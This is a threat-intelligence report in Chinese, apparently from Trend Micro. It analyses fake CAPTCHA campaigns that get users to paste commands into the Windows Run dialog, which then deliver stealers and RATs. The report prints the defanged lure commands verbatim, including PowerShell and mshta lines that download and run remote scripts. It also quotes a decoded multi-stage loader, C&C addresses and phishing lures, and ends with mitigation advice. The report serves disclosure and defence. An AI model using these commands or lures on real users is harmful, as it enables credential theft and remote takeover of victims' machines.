虚假验证码攻击通过多阶段载荷链部署信息窃取器和远程访问木马

报告摘要

趋势科技研究团队发现了一系列虚假CAPTCHA页面，诱使用户将恶意命令粘贴到Windows运行对话框中。这些活动通过钓鱼邮件、恶意广告或SEO投毒传播嵌入混淆JavaScript的文件（如MP3、PDF）。载荷使用mshta.exe或PowerShell在内存中执行，通常绕过传统的基于文件的检测。

这些攻击通过Lumma Stealer、Rhadamanthys、AsyncRAT、Emmenhtal和XWorm等恶意软件实现数据外泄、凭据窃取、远程访问和加载器部署。业务风险包括终端被入侵、未经授权的数据访问以及通过持久后门和C&C通道造成的运营中断。

运行基于Windows环境且脚本执行限制最少的组织会受到影响。这些活动滥用了多个合法平台，包括文件共享服务、内容和搜索平台、音乐存储库、URL重定向器和文档托管服务。攻击利用了用户对CAPTCHA界面和熟悉品牌的信任。

禁用运行对话框和公共文件共享平台的访问，以及强化浏览器设置，可以显著减少对此威胁的暴露。请参阅下面的缓解指南，了解其他最佳实践以及趋势科技解决方案如何帮助防御这些攻击的概述。

趋势Vision One™检测并阻止本博客中讨论的IOC。趋势Vision One客户还可以访问狩猎查询、威胁洞察和威胁情报报告，以获取有关这些攻击的丰富上下文和最新更新。

初始访问

用户遇到模仿合法人工验证提示的CAPTCHA页面，通常是在浏览看似无害的内容网站时。在某些情况下，钓鱼电子邮件用于将用户重定向到这些欺骗性页面。页面会指示用户将命令复制并粘贴到运行对话框（Win + R）中作为“验证”过程的一部分。一旦执行，该命令将启动一个恶意脚本，在机器上安装各种威胁。

以下是我们分析中观察到的一些用户被提示运行的命令：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

mshta.exe hxxps://ernier[.]shop/lyricalsync[.]mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203
mshta.exe hxxps://zb-files[.]oss-ap-southeast-1[.]aliyuncs[.]com/DPST_doc.mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 815403
mshta.exe hxxp://ok[.]fish-cloud-jar[.]us/ # "Authentication needed: Secure Code 3V8MUR-9PW4S"
mshta.exe hxxps://yedik[.]shop/Tech_House_Future[.]mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203
mshta.exe hxxps://x63-hello[.]live/nF3mXcQ9FVjs1sMt[.]html #'' I'm human ID241619''
mshta.exe hxxps://welcome12-world[.]com/wpDoQRpZt2PIffud[.]html #'' I'm human ID233560''
mshta.exe hxxps://w19-seasalt[.]com/mbDjBsRmxM1LreEp[.]html #'' I'm human ID984662''
PowerShell.exe -W Hidden -command $uri = 'hxxps[://]fessoclick[.]com/clck/dub.txt'; $content = (Invoke-WebRequest -Uri $uri).Content; Invoke-Expression $content”
cmd /c "powershell -w h -e aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwB2AGkAZQB3AGUAcgAtAHYAYwBjAHAAYQBzAHMALgBjAG8AbQAvAGkAbgAuAHAAaABwAD8AYQBjAHQAaQBvAG4APQAxACcAKQA=" && ✅ I am not a robot - reCAPTCHA ID: 7845
mshta hxxps://check[.]nejyd[.]icu/gkcxv[.]google?i=db47f2d4-a1c2-405f-ba9f-8188d2da9156 REM ✅ Human, not a robot: Verification САРTCHA ID:658630
PoWeRsHeLl -w h -c cUr"L.E"x"E" -k -L hxxp"s://ka"j"e"c.icu"/f"04b18c2f7ff"48bdbf06"701"38"f9eb2"4f.txt | pow"e"rs"h"el"l" -

对钓鱼电子邮件的分析揭示了反复出现的主题。主题行涉及客人遗留物品、制造紧迫感，并引发对安全或保密性的担忧。这些电子邮件通常提及据称遗留的特定物品，并使用正式、专业的语气来增强可信度并促使用户迅速采取行动。电子邮件主题的示例包括：

• Action Required - Guest’s Valuable Items Left Behind
• Attention Required: Guest’s Personal Diary & Documents Found
• Critical Notice: Guest’s Safe Deposit Box Left Unlocked
• Emergency Notice: Guest’s Medical Equipment Left at Property
• Final Attempt: Guest’s Expensive Items Left in Room – Urgent Action Required
• Guest Items Left at Your Property – Immediate Attention Required
• High-Risk Item: Guest’s Confidential Laptop Left Unsecured
• Immediate Contact Needed - Guest Items
• Legal & Security Concern: Guest’s Passport & Immigration Papers Forgotten
• Lost & Found Update: Guest’s Electronic Devices Discovered
• Please Contact Guest - Forgotten Belongings
• RV: Time-Sensitive: Guest’s Lost Credit Cards Found
• Security Alert: Guest’s Laptop and Phone Left at Property
• Time-Sensitive: Guest’s Lost Credit Cards Found
• Urgent Attention - Guest Items at Your Hotel
• Urgent Security Concern: Guest’s Unclaimed Identification Documents

每个钓鱼电子邮件中嵌入的URL利用合法域名的可信度，例如https://xxx[.]51.ca和hxxps://www[.]xxxnet.dk，以对毫无戒心的用户显得可信。然而，一旦点击，这些URL会将用户重定向到虚假CAPTCHA域名的登录页面。

1
2
3
4
5
6
7

hxxps://sns[.]xx[.]ca/link[.]php?url=///guests-reservid[.]com
hxxps://sns[.]xx[.]ca/link[.]php?url=///guest-idreserve[.]com
hxxps://sns[.]xx[.]ca/link[.]php?url=///idguset-reserve[.]com
hxxps://sns[.]xx[.]ca/link[.]php?url=///guestdocfound[.]com
hxxps://sns[.]xx[.]ca/link[.]php?url=///itemsfoundguest[.]com
hxxps://sns[.]xx[.]ca/link[.]php?url=///guestitemsfound[.]com
hxxps://www[.]xxxnet[.]dk/out[.]php?link=///guests-reservid[.]com

在某些情况下，钓鱼电子邮件附加PDF而不是包含直接链接。一旦打开，PDF会将用户重定向到虚假CAPTCHA登录页面。在下面显示的示例PDF中，用户点击嵌入的链接“hxxps://viewer-vccpass[.]com”后会被重定向到虚假页面。

该活动通过我们的Vision One遥测捕获，从而能够更深入地分析每个事件的影响。在另一个示例如下所示，点击Outlook中收到的电子邮件中的链接将启动Microsoft Edge并将他们重定向到FakeCaptcha页面“guest-idreserve[.]com”。通过我们的MxDR监控，我们能够跟踪与多个案例中的虚假CAPTCHA活动相关的所有活动。这种可见性允许快速深入调查并立即响应以遏制威胁并最小化潜在损害。

1
2
3
4

processCmd: "C:\Program Files (x86)\Microsoft Office\Office16\OUTLOOK.EXE" /restore
 eventSubId: 2 - TELEMETRY_PROCESS_CREATE
 objectFilePath: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
 objectCmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fsns.51.ca%2flink.php%3furl%3d%2f%2f%2fguest%2didreserve.com&umid=752b0533-6767-40ff-912a-4588faff641e&rct=1741302019&auth=425f1f34671f589a3c09af172bfc11942b97c2dc-1a12aafe890dacb37dba6b470ea1876e59d08cbe

攻击者还使用SEO投毒来诱骗受害者访问虚假CAPTCHA登录页面。在一个案例中，用户在Google上搜索“Longleat House”。使用趋势Vision One中取证应用程序的浏览历史数据，我们能够识别确切的搜索查询：“Longleat House Entrance”。如图5所示，搜索此短语返回了一个排名靠前的结果，一个被入侵的合法网站，该网站导致虚假CAPTCHA登录页面。

访问该网站会导致一个虚假CAPTCHA页面，指示用户将恶意、混淆的命令粘贴到运行对话框中。该命令然后在内存中直接执行远程脚本。

执行

为清晰起见，我们重点分析将恶意脚本嵌入MP3文件中的虚假CAPTCHA攻击，因为它们采用了独特的技术。虽然特定脚本和阶段可能因事件而异，但整体模式和行为保持一致。

遥测表明mshta执行文件lyricalsync.mp3，这是一个托管在hxxps://ernie[.]shop上的特制MP3文件。

1
2
3

File path: C:\Windows\System32\mshta.exe
 "C:\WINDOWS\system32\mshta.exe" hxxps://ernier[.]shop/lyricalsync.mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203
 C:\Users\srt\AppData\Local\Microsoft\Windows\INetCache\IE\TKYD709X/lyricalsync.mp3

威胁情报识别了与hxxps://ernier[.]shop/lyricalsync[.]mp3相关的几个引荐URL。访问这些URL会导致登录页面显示虚假CAPTCHA，指示用户将恶意命令复制并粘贴到运行对话框中。这种行为在我们分析的其他案例中是一致的。虽然托管MP3文件的确切URL可能不同，但每个都包含一个最终将用户重定向到虚假CAPTCHA页面的引荐URL。

访问这些引荐URL之一会将用户重定向到一个虚假CAPTCHA提示，通常标记为“Verify You Are Human”或“I’m not a robot”。

当用户点击“I’m not a robot”时，他们会收到提示在机器上复制并执行恶意代码。在此示例中，屏幕将显示以下内容：

与其他虚假CAPTCHA活动一样，威胁参与者正在积极更新这些网站上的URL和脚本。如图11所示，在我们初步分析后仅一天就使用了不同的URL，并且页面的外观也发生了变化。这种策略使攻击者能够保持操作的连续性——如果一个URL被阻止或关闭，他们可以快速切换到新的URL。

每个虚假CAPTCHA页面包含一个脚本，该脚本动态生成并将mshta命令复制到用户的剪贴板。该命令指向托管恶意HTA或MP3文件的远程站点。该命令是Base64编码的，并使用JavaScript自动解码并将其复制到剪贴板。

文件lyricalsync.mp3包含一个具有多重编码阶段的JavaScript：首先是Base64，然后是十六进制。乍一看，它似乎是一个正常的音频文件——播放时，它会播放Reign on Me的歌曲“Done With You”。

在某些情况下，音频文件直接嵌入网页中。

对来自多个案例的MP3文件头的分析揭示了一致的模式。许多似乎源自免版税音乐网站www[.]jamendo[.]com。威胁参与者似乎下载这些合法的音频文件，注入恶意JavaScript，并将其重新用作恶意软件传递工具。

这个lyricalsync.mp3文件包含混淆的JavaScript（我们检测为Trojan.JS.EMMENHTAL.SM）。当通过mshta执行时，它会触发脚本，该脚本在运行实际载荷之前经历多个反混淆阶段。在其他案例中发现了类似的技术。

当lyricalsync.mp3通过mshta执行时，它会启动一个多阶段反混淆过程，旨在逃避检测机制，如下所示：

第一阶段编码脚本（Base64）：

1

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E JABSAHgAVQB6ACAAPQAgACcANgA5ADYANQA3ADgANQAzADcANAA2ADEANwAyADcANAAyAEQANQAwADcAMgA2AEYANgAzADYANQA3ADMANwAzADIAMAAyADIAMgA0ADYANQA2AEUANwA2ADMAQQA1ADcANAA5ADQARQA0ADQANAA5ADUAMgA1AEMANQAzADcAOQA3ADMANQA3ADQARgA1ADcAMwA2ADMANAA1AEMANQA3ADYAOQA2AEUANgA0ADYARgA3ADcANwAzADUAMAA2AEYANwA3ADYANQAv <已编辑>

第二阶段编码脚本（十六进制）：

1

$RxUz = '69657853746172742D50726F63657373202224656E763A57494E4449525C537973574F5736345C57696E646F7773506F7765725368656C6C5C76312E305C706F7765727368656C6C2E65786522202D417267756D656E744C69737420272D4E6F50726F66696C65272C272D457865637574696F6E506F6C696379272C27556E72657374726963746564272C272D436F6D6D616E64272C27535620396620285B4E65742E576<已编辑>' -split '(.{2})' | Where-Object {$_} | ForEach-Object {[char]([convert]::ToInt32($_,16))};$RxUz = $RxUz -join ''; & $RxUz.Substring(0,3) $RxUz.Substring(3)

最终完全解码的脚本：

1

iex "Start-Process \"$env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe\" -ArgumentList '-NoProfile','-ExecutionPolicy','Unrestricted','-Command','SV 9f ([Net.WebClient]::New());SV 09h ''https://bi[.]yuoie[.]shop/750413b4e6897a671bc759e04597952a0be747830189873b.xlsx'';Set-Item Variable:/Ob9 (((( [Net.WebClient]::New()|Member)|Where-Object{(Get-ChildItem Variable:_).Value.Name-like'*nl*g*'}).Name));(Variable *uti*t).Value|ForEach-Object{(Get-ChildItem Variable:_).Value.InvokeCommand.( ( (Variable *uti*t).Value.InvokeCommand.PsObject.Methods|Where-Object{(Get-ChildItem Variable:_).Value.Name-like'*k*ript*'}).Name)}( (9f).Value.(GCI Variable:\Ob9).Value)(Item Variable:09h).Value}' -WindowStyle Hidden;$yiZLHS = $env:AppData;function qhlncfrI($oDusI, $lHglEMM){curl $oDusI -o $lHglEMM};function WpKhSwg(){function ELPZqDpBs($rurDrA){if(!(Test-Path -Path $lHglEMM)){qhlncfrI $rurDrA $lHglEMM}}}WpKhSwg;

最终解码的PowerShell脚本最初启动一个新的PowerShell进程，具有无限制的执行策略且无用户配置文件，以避免检测。然后它创建一个WebClient对象来连接并从另一个URL下载文件，https://bi.yuoie[.]shop/750413b4e6897a671bc759e04597952a0be747830189873b.xlsx。在我们分析时，此文件包含另一个高度混淆的PowerShell脚本。

此文件被下载到本地路径，可能在用户的应用程序数据目录内：

1

path: C:\Users\<username>\AppData\Roaming\750413b4e6897a671bc759e04597952a0be747830189873b.xlsx

为避免检测，脚本在隐藏窗口中运行。它还定义了函数来验证文件路径的存在，并使用curl别名下载文件（如果尚未下载）。

PowerShell脚本“750413b4e6897a671bc759e04597952a0be747830189873b.xlsx”与以下域通信：

1
2

buyvault[.]shop
bi.yuoei[.]shop

然后它对svchost.exe执行代码注入，生成合法文件“C:\Windows\System32\OOBE-Maintenance.exe”。然后使用此文件连接到以下命令和控制（C&C）服务器，176[.]65[.]141[.]165:8587。

接下来，它使用存储在C:\Users\srt\AppData\Local\Temp\chrxxxx.tmp中的临时用户配置文件启动基于Chromium的浏览器（如Google Chrome）。然后禁用GPU，允许端口8000，并在127.0.0.1:8000打开一个潜在的恶意本地Web服务器，可能是C&C通信的一部分：

1
2
3
4
5

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
 --user-data-dir="C:\Users\srt\AppData\Local\Temp\chr18E2.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/356e38cd/8ed4f620"

C:\Program Files\Google\Chrome\Application\chrome.exe
 --user-data-dir="C:\Users\srt\AppData\Local\Temp\chr4D53.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/356e38cd/30a0f650"

除了Lumma Stealer，我们还观察到它钩入“C:\Program Files\Windows Media Player\wmplayer.exe”，然后创建AvastBrowserUpdate.exe并使用DLL侧加载加载恶意DLL文件goopdate.dll以执行恶意代码（我们检测为PUA.Win32.FakeGoop.A.component）：

1
2

C:\Users\srt\AppData\Roaming\IPEvcon\AvastBrowserUpdate.exe
C:\Users\srt\AppData\Roaming\IPEvcon\goopdate.dll (3e2794400664f6ae9a9b27821bf01ca008f99e1d)

在另一个实例中，我们观察到编码的MP3文件连接到另一个URL以下载并执行另一个高度混淆的PowerShell脚本。它连接到文件托管站点MediaFire（download2431[.]mediafire[.]com）以下载第二阶段载荷，最终导致Lumma Stealer。

揭示载荷归属

我们对虚假CAPTCHA技术的分析揭示了多样但相互关联的妥协指标（IoC），这些指标与一系列已知恶意软件家族相关。通过遍历URL关系和VirusTotal的遥测，我们在传递基础设施和恶意软件家族之间建立了高置信度的链接。此方法揭示了与Lumma Stealer、Emmenhtal、Rhadamanthys、AsyncRAT和XWorm相关的集群。以下是这些IoC如何与活动中观察到的每个恶意软件菌株连接的概述：

Lumma Stealer： 通过VirusTotal的关系图，多个URL指向已知的Lumma Stealer分发节点。

Emmenhtal： 对Emmenhtal恶意软件的归属基于在C&C基础设施和恶意软件传递机制中观察到的重叠。当前活动中识别的元素与先前记录的与Emmenhtal活动相关的指标一致，增强了此归属的置信度。

Rhadamanthys： 此链接得到通过历史恶意软件提交和存储库关系观察到的基础设施重叠的支持。下图说明了这些连接，加强了与已知Rhadamanthys活动的关联。

AsyncRAT / XWorm： 共享的传递URL 185[.]7[.]214[.]108/a[.]mp4被发现托管标记为AsyncRAT和XWorm的载荷。VirusTotal图分析确认此IP已反复用于托管远程访问木马（RAT）和轻量级恶意软件投放器，表明根据目标环境使用多载荷或模块化加载器。

针对虚假验证码攻击的安全实践

这些虚假CAPTCHA活动继续变得越来越复杂，威胁参与者采用先进技术，如多阶段混淆、内存中脚本执行，以及在某些情况下，将混淆的JavaScript隐藏在看似良性的MP3文件中。主要传递方法包括钓鱼电子邮件——带有嵌入的恶意链接或附件——以及不可信网站上的恶意广告。

无论入口点如何，攻击链通常依赖于混淆的JavaScript或PowerShell脚本来检索和执行各种载荷。这些通常借助像Emmenhtal这样的加载器来下载信息窃取器，如Lumma Stealer和Rhadamanthys，或像AsyncRAT和XWorm这样的RAT。

我们预计未来的虚假CAPTCHA攻击将在MP3和HTA文件之外的其他不常见格式中嵌入载荷。虽然恶意广告和钓鱼电子邮件仍然是主要的分发方法，但攻击者可能会开始尝试使用社交媒体平台或消息传递应用程序来传递缩短或伪装的链接。

继续使用mshta.exe和PowerShell可能是由于它们在大多数环境中的可访问性。然而，我们可能还会看到增加使用其他离地生存二进制文件（LOLBins）来逃避检测，例如rundll32和regsvr32。

以下是一些防御这些攻击的安全最佳实践：

• 禁用运行对话框（Win + R）的访问。 在限制用户对管理工具和脚本执行的访问是优先考虑的环境中，这是可取的。这降低了执行恶意PowerShell或MSHTA命令的风险，并限制了本机Windows实用程序的滥用。
• 应用最小权限原则。 除了限制运行对话框，确保用户仅被授予执行其任务所需的权限。这包括限制对敏感目录的写入或执行访问，在不需要的地方禁用脚本执行，以及在没有批准工作流的情况下防止提升到管理员权限。降低权限级别限制了用户（和恶意软件）执行系统更改命令的能力。
• 限制对未经批准的工具和文件共享平台的访问。 维护批准软件的基线，并在不需要业务使用的情况下阻止对公共文件共享服务的访问。控制访问有助于降低未经授权下载的风险，并限制攻击者传递或加载额外组件的能力。
• 监控异常的剪贴板和进程行为。 正如这些攻击所展示的，用户可能被社会工程学诱导从剪贴板粘贴和执行恶意命令。监控异常的剪贴板活动——例如编码的命令或可疑的脚本片段——可以提供早期警告信号。跟踪进程行为也很重要，特别是在用户与Web内容、PDF或消息传递应用程序交互的环境中。注意滥用模式，例如媒体播放器或浏览器生成意外的可执行文件或脚本解释器，这可能表明载荷传递。
• 强化浏览器配置。 配置浏览器以减少对SEO投毒、恶意广告和基于脚本的威胁的暴露。这包括限制在不受信任或未知域上执行JavaScript，启用过滤器以阻止恶意广告网络，禁用自动播放和混合内容以减少嵌入脚本的风险，以及移除不必要的浏览器插件或扩展——特别是那些具有提升权限或过时组件的插件或扩展。
• 启用内存保护功能。 Windows环境中有内置的操作系统级控件，可以启用以检测内存中执行、反射DLL注入和其他规避技术。这些保护有助于防御绕过传统基于文件检测的多阶段、无文件载荷。
• 投资用户教育。 培训用户识别可疑链接或钓鱼电子邮件显著降低了被入侵的风险。围绕安全浏览的意识——即使在生产网络上——也至关重要，因为像虚假CAPTCHA攻击这样的威胁利用了用户信任和社会工程学策略。
• MDR在防御虚假CAPTCHA活动中至关重要。 MDR服务提供持续监控、主动威胁狩猎和快速响应，帮助在发生重大损害之前快速检测和遏制可疑行为或威胁。在此类活动中，攻击者依赖规避性、无文件技术和社会工程学执行，MDR能够跨终端、网络流量和用户行为进行实时遥测关联。这种可见性对于识别异常模式（例如基于脚本的执行链或异常的进程启动）并启动及时的遏制行动至关重要。

趋势科技的终端和网络解决方案包括行为监控、预测性机器学习（PML）和Web信誉服务（WRS），可检测行为异常、先发制人地阻止未知威胁并防止访问恶意URL。行为监控通过分析进程行为而不是仅依赖签名，帮助实时检测可疑活动，例如剪贴板操作、通过mshta.exe或powershell.exe执行以及其他离地生存技术。PML通过在执行前分析文件特征，提供对新威胁和未知威胁的主动保护，即使在没有特定恶意软件先验知识的情况下也能阻止混淆的加载器和恶意脚本。WRS阻止访问恶意或被入侵的URL，防止用户被重定向到虚假CAPTCHA页面。

通过趋势Vision One™实现主动安全

趋势Vision One™是唯一一个由AI驱动的企业网络安全平台，集中了网络风险暴露管理、安全运营和强大的分层保护。这种全面方法帮助您预测和预防威胁，加速整个数字资产的主动安全成果。凭借数十年的网络安全领导地位和行业首个主动网络安全AI趋势Cybertron的支持，它提供了经过验证的结果：勒索软件风险降低92%，检测时间减少99%。安全领导者可以基准化他们的态势并向利益相关者展示持续改进。借助趋势Vision One，您能够消除安全盲点，专注于最重要的事情，并将安全提升为创新的战略合作伙伴。

趋势微™威胁情报

为了领先于不断演变的威胁，趋势客户可以访问趋势Vision One™威胁洞察，该功能提供趋势研究关于新兴威胁和威胁参与者的最新见解。

趋势Vision One威胁洞察

新兴威胁：虚假验证码攻击通过多阶段载荷链部署信息窃取器和远程访问木马

趋势Vision One情报报告应用程序（IOC扫描）

虚假验证码攻击通过多阶段载荷链部署信息窃取器和远程访问木马

狩猎查询 趋势Vision One搜索应用程序 趋势Vision One客户可以使用搜索应用程序在其环境中的数据中匹配或狩猎本博客文章中提到的恶意指标。

1
2

Fake CAPTCHA_Stealer
malName:(EMMENHTAL OR RHADAMANTHYS OR XWORM OR LUMMASTEALER) AND eventName:MALWARE_DETECTION AND LogType: detection

更多狩猎查询可供具有威胁洞察权限的趋势Vision One客户使用。

妥协指标

此条目的妥协指标可以在此处找到。